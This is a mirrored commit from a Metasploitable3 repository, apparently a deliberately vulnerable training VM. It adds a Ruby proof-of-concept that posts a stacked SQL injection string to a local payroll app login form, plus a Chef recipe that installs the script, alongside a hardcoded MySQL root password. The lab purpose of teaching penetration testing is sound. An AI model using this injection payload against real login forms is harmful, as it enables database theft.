Marown/metasploitable3
1
0
Fork 0
mirror of https://github.com/rapid7/metasploitable3.git synced 2024-06-28 07:45:49 +02:00
Code Issues Packages Projects Releases Wiki Activity

Add poc for sql injection.

Browse Source
This commit is contained in:
James Barnett 2017-04-11 16:12:46 -05:00
parent dc8ffbcec6
commit bc8fb88017
3 changed files with 26 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
chef/cookbooks/metasploitable/files/payroll_app/payroll_app.php
View File

@ -38,6 +38,7 @@ if($_POST['s']){
foreach ($keys as $key) {
echo "<td>" . $row[$key] . "</td>";
}
echo "</tr>\n";
}
$result->free();
}

14
chef/cookbooks/metasploitable/files/payroll_app/poc.rb Normal file
View File

@ -0,0 +1,14 @@
require 'net/http'
url = "http://127.0.0.1/payroll_app.php"
uri = URI(url)
user = 'luke_skywalker'
injection = "password'; select password from users where username='' OR ''='"
puts "Making POST request to #{uri} with the following parameters:"
puts "'user' = #{user}"
puts "'password' = #{injection}"
res = Net::HTTP.post_form(uri, 'user' => user, 'password' => injection, 's' => 'OK')
puts "Response body is #{res.body}"
puts "Done"

11
chef/cookbooks/metasploitable/recipes/payroll_app.rb
View File

@ -13,6 +13,17 @@ cookbook_file '/tmp/payroll.sql' do
mode '0755'
end
directory '/home/vagrant/poc/payroll_app/' do
mode '0755'
owner 'vagrant'
recursive true
end
cookbook_file '/home/vagrant/poc/payroll_app/poc.rb' do
source 'payroll_app/poc.rb'
mode '0755'
end
bash 'create payroll database and import data' do
code <<-EOH
mysql -S /var/run/mysql-default/mysqld.sock --user="root" --password="sploitme" --execute="CREATE DATABASE payroll;"